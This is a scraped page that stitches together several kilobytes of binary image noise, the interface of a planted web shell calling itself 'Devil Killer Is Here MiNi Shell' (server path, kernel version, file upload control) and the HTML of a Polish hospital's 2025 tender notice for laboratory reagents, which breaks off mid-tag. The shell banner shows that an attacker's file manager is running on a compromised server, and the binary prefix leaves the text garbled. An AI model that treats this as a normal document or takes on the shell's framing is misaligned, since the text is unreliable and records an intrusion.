JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250407/0017874901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Sukcesywna dostawa odczynników diagnostycznych do medycznych badań laboratoryjnych” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MAŁOPOLSKI SZPITAL CHORÓB PŁUC I REHABILITACJI IM. EDMUNDA WOJTYŁY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000294214</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kolejowa 1A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jaroszowiec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-310</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL21A - Oświęcimski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@wschp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wschp.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Sukcesywna dostawa odczynników diagnostycznych do medycznych badań laboratoryjnych” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4aba3c69-96c7-4d6f-b13c-04d3a34a6ce0</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00178749</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00052702/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.5 Dostawa odczynników laboratoryjnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-4aba3c69-96c7-4d6f-b13c-04d3a34a6ce0 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem: https://ezamowienia.gov.pl.<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3. Adres strony internetowej prowadzonego postępowania (link prowadzący bezpośrednio do widoku postępowania na Platformie e-<br/>Zamówienia):<br/>https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-4aba3c69-96c7-4d6f-b13c-04d3a34a6ce0<br/>4. Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia (przycisk „Przeglądaj<br/>postępowania/konkursy”).<br/>5. Identyfikator (ID) postępowania na Platformie e-Zamówienia:<br/>ocds-148610-4aba3c69-96c7-4d6f-b13c-04d3a34a6ce0<br/>6. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych.<br/>2. Dokumenty elektroniczne , o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>3. Informacje, oświadczenia lub dokumenty , inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a) w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub<br/>b) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>4. Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień,<br/>zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). (...) cd w SWZ<br/>5. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>6. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>7. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>8. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>9. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 i/lub (22) 458 77 99 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>10. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: sekretariat@wschp.pl (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w postępowaniu).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 19 ust. 1 ustawy z 11 września 2019 r. - Prawo zamówień publicznych<br/>(Dz. z 2024 r. poz. 1320 t.j.) w związku z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, zwane dalej także<br/>&#34;RODO&#34;) informuję, iż: <br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”,<br/>informuję, że:<br/>􀀀 administratorem Pani/Pana danych osobowych jest<br/>Małopolski Szpital Chorób Płuc i Rehabilitacji im. Edmunda Wojtyły, ul. Kolejowa 1a,<br/>32-310 Jaroszowiec tel. 32 642 80 90 inspektor ochrony danych osobowych w Małopolskim Szpitalu Chorób Płuc i Rehabilitacji im. Edmunda Wojtyły, ul. Kolejowa 1a, 32- 310 Jaroszowiec tel. 32 642 80 90, adres e-mail iodo@wschp.pl; Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie podstawowym pn.: Sukcesywna dostawa odczynników diagnostycznych do medycznych badań laboratoryjnych odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2024 r. poz. 1320 z późn. zm.), dalej „ustawa Pzp”;<br/>􀀀 Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>􀀀 obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>􀀀 w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>􀀀 posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">􀀀 nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.I.2.224/04/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa odczynników diagnostycznych do medycznych badań laboratoryjnych do Laboratorium Małopolskiego Szpitala Chorób Płuc i Rehabilitacji im. Edmunda Wojtyły w lokalizacji Jaroszowiec, ul. Kolejowa 1a w asortymencie i ilościach wyszczególnionych w Załączniku nr 1A do SWZ - Formularz asortymentowo-cenowy.<br/>2.	Zamawiający informuje, iż odczynniki których dotyczy przedmiotowe postępowanie służą do wykonywania medycznych badań laboratoryjnych na aparatach/systemach laboratoryjnych będących w posiadaniu Zamawiającego/będących jego własnością.<br/>3.	Przedmiot zamówienia obejmuje sukcesywną sprzedaż oraz dostawę odczynników zgodnie z formularzem cenowym stanowiącym załącznik nr 1A do SWZ. <br/>4.	Szczegółowy opis zamówienia znajduje się w formularzu asortymentowo cenowym – załączniku nr 1A do specyfikacji warunków zamówienia, zwanej dalej SWZ. <br/>5.	Zamówienie zostało podzielone na 3 części. Zamawiający dopuszcza składanie ofert częściowych – gdzie część zamówienia stanowi dane Zadanie wg podziału jak poniżej:<br/><br/>Zadanie nr 1. - Odczynniki do wykonywania badań gazometrycznych w analizatorze OPTI CCA-TS2<br/>Zadanie nr 2. - Odczynniki do wykonywania mikrobiologicznych badań molekularnych w systemie zamkniętym metodą RT-PCR w analizatorze GeneXpert 10C<br/>Zadanie nr 3.- Odczynniki do wykonywania hodowli Mycobacterium na podłożach płynnych w systemie automatycznym BD BACTEC MGIT 320<br/><br/>6.	Przyjęte przez zamawiającego w formularzu asortymentowo-cenowym – Załączniku nr 1A do SWZ planowane ilości produktów są ilościami szacunkowymi. Zamawiający zastrzega prawo zamówienia w okresie obowiązywania umowy mniejszej lub większej ilości produktów w stosunku do ilości przyjętych w formularzu cenowym, stosownie do swoich potrzeb, przy czym zmiany te nie spowodują przekroczenia łącznej wartości umowy. Zamawiający zobowiązuje się do minimalnej realizacji zamówienia na poziomie nie mniejszym niż 80% łącznej wartości umowy.<br/>7.	Ewentualne zamówienie w okresie obowiązywania umowy mniejszej lub większej ilości produktów nie spowoduje zmiany ich cen podanych przez wykonawcę w ofercie, jak również z tego powodu nie będą przysługiwały wykonawcy żadne dodatkowe roszczenia w stosunku do zamawiającego.<br/>8.	Wykonawca zobowiązany jest do realizacji zamówienia z poszanowaniem zasad bezpieczeństwa i higieny pracy.<br/>9.	Odczynniki dostarczane do siedziby Zamawiającego w dostawach sukcesywnych do 7 dni roboczych od dnia złożenia zamówienia. Zamawiający zastrzega, że w przypadkach nagłych tzw. Cito. Wykonawca zobowiązany będzie zrealizować dostawę cząstkową w terminie do 24 godzin, licząc od godziny złożenia zapotrzebowania przez Zamawiającego.<br/>10.	Przedmiot zamówienia winien posiadać dokumenty potwierdzające, że oferowane produkty zakwalifikowane są jako wyroby medyczne w rozumieniu ustawy z dnia 20.05.2010 r. o wyrobach medycznych z późn. zm.<br/>11.	Przedmiot zamówienia winien posiadać odpowiedni certyfikat CE, deklarację zgodności, certyfikat z badania, który należy dostarczyć wraz z dostawą zamawianych odczynników. <br/>12.	Z ofertą prosimy o przedstawienie ostatnich aktualnych certyfikatów badania dla odczynników.<br/>13.	Dostarczenie karty charakterystyki odczynnika i Instrukcji używania odczynników w języku polskim wraz z dostawą lub wskazanie adresu internetowego ( linku), który umożliwi wgląd i pobranie aktualnej instrukcji.<br/>14.	Kody CPV:<br/>Główny kod: <br/>33696500-0 – Odczynniki laboratoryjne<br/>Zadanie 1. 33696200-7 – Odczynniki do badania krwi<br/>Zadanie 2. 33696500-0<br/>Zadanie 3. 33696500-0 <br/>15.	Równoważność<br/>	Zamawiający dopuszcza składanie ofert równoważnych. <br/>W przypadku zaoferowania przez Wykonawcę produktu równoważnego, wymagane jest uzupełnienie kolumny– „Numer katalogowy oraz nazwa Wykonawcy/Producenta”. <br/>Zamawiający dopuszcza możliwość zaoferowania produktów równoważnych jakościowo, fizykochemicznie, eksploatacyjnie i technicznie. Poniżej opisana definicja równoważności odnosi się do wszystkich pakietów.<br/>Użyte w zadaniach nazwy własne producentów/dostawców zostały umieszczone ze względów technologicznych, z uwagi na konieczność zachowania norm, parametrów i standardów, jakimi charakteryzują się posiadane przez zamawiającego urządzenia bądź realizowane badania.<br/>Przez podanie nazw własnych produktów(numerów katalogowych), będących przedmiotem zamówienia, zamawiający określa minimalne parametry, cechy użytkowe oraz jakościowe, jakim powinny odpowiadać produkty równoważne, aby spełniały stawiane wymagania.<br/>Zaproponowane przez Wykonawców w ofercie produkty równoważne muszą posiadać minimalne parametry odpowiadające produktom wyszczególnionym w pakietach a także posiadać cechy jakościowe i cechy użytkowe nie gorsze niż produkty wymienione przez Zamawiającego w wyspecyfikowanych pakietach.<br/>Wykonawca, który w ofercie powoła się na zastosowanie produktów równoważnych opisywanych w SWZ, jest zobowiązany wykazać, że oferowane produkty produkowane są w takim procesie technologicznym oraz posiadają nie gorsze właściwości, które zapewniają takie same warunki realizacji prowadzonych badań co produkty w opisie SWZ. Wymóg ten podyktowany jest koniecznością uniknięcia powtórzenia wykonywanych badań oraz utraty uzyskanych wyników. W przypadku zaoferowania produktu równoważnego Wykonawca dołączy do oferty podpisany dowód równoważności (certyfikat jakości, karta charakterystyki, metodykę, instrukcję użycia odczynnika w aparacie/systemie będącym w posiadaniu Zamawiającego, atest lub inny dokument z którego wynika równoważność).<br/><br/>15.OFERTY CZĘŚCIOWE<br/>Zamówienie zostało podzielone na 3 części. Zamawiający dopuszcza składanie ofert częściowych – gdzie część zamówienia stanowi dane Zadanie wg podziału jak poniżej:<br/>Zadanie nr 1. - Odczynniki do wykonywania badań gazometrycznych w analizatorze OPTI CCA-TS2<br/>Zadanie nr 2. - Odczynniki do wykonywania mikrobiologicznych badań molekularnych w systemie zamkniętym metodą RT-PCR w analizatorze GeneXpert 10C<br/>Zadanie nr 3.- Odczynniki do wykonywania hodowli Mycobacterium na podłożach płynnych w systemie automatycznym BD BACTEC MGIT 320 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33696200-7 - Odczynniki do badania krwi</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający do etapu oceny ofert pod względem ustalonych w ust. 2 kryteriów zakwalifikuje oferty spełniające następujące wymagania:<br/>a)	oferta została złożona w określonym przez Zamawiającego terminie,<br/>b)	złożone przez Wykonawcę dokumenty (oświadczenia) potwierdzają spełnianie przez niego warunków udziału w Postępowaniu określone w Specyfikacji,<br/>c)	złożone oświadczenia i wymagane dokumenty są aktualne, zostały złożone w odpowiedniej formie i są podpisane przez osoby uprawnione do reprezentowania Wykonawcy,<br/>d)	oferta nie podlega odrzuceniu. <br/><br/>2.	Opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów i sposobem ich oceny.<br/>Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu. <br/>Zamawiający będzie oceniał oferty według następujących kryteriów: <br/> <br/>Nr Nazwa kryterium Waga <br/>1. Cena (Koszt) 100 pkt<br/>3.	Oferta wypełniająca w najwyższym stopniu wymagania określone w ww. kryteriach otrzyma maksymalną liczbę punktów. Pozostałym wykonawcom, wypełniającym wymagania kryterialne przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) liczba punktów. Wynik będzie traktowany jako wartość punktowa oferty.<br/>4.	Oferty Wykonawców niewykluczonych oraz oferty nieodrzucone będą oceniane w skali 100-punktowej wg wzoru:<br/>Kryterium – Cena (C) obliczane wg wzoru: <br/> Najniższa oferowana cena brutto<br/>------------------------------------------------ x 100 x 100 %<br/> Cena brutto badanej oferty <br/><br/>5.	Oferta może uzyskać maksymalnie 100 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 